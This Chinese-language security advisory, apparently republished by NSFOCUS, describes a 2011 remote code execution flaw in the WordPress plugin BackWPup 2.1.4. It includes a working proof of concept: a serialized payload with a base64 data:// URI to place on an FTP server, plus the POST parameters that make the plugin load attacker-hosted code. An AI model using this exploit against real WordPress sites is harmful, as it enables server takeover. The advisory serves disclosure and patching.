安全研究

安全漏洞
WordPress插件BackWPUp 2.1.4任意代码执行漏洞

发布日期:2011-10-17
更新日期:2011-10-18

受影响系统:
WordPress WordPress 2.1.4
描述:
WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。

WordPress插件BackWPup 2.1.4在job/wp_export_generate.php的BackWPUpJobTemp POST参数上缺少数据验证,可使攻击者指定FTP资源为输入,造成在Web服务器上执行本地或远程代码。

<*来源:Phil Taylor
  
  链接:http://seclists.org/bugtraq/2011/Oct/101
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

上传下面内容到公用的FTP服务器并命名为"file.txt.running".

a:2:{s:7:"WORKING";a:1:{s:5:"NONCE";s:3:"123";}s:8:"ABS_PATH";s:25:
"data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=";}

This serialised string creates an array containing:

$infile['WORKING'] = array();
$infile['WORKING']['NONCE'] = '123';
$infile['ABS_PATH'] = 'data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=';

Once uploaded ensure the FTP file is writeable and issue a POST to
"job/wp_export_generate.php" with the following parameters:

$_POST['BackWPupJobTemp'] = "ftp://user:password () 10 2 0 128/file.txt";
$_POST['nonce'] = '123';
$_POST['type'] = 'getxmlexport';

建议:
厂商补丁:

WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://wordpress.org/

浏览次数:4234
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障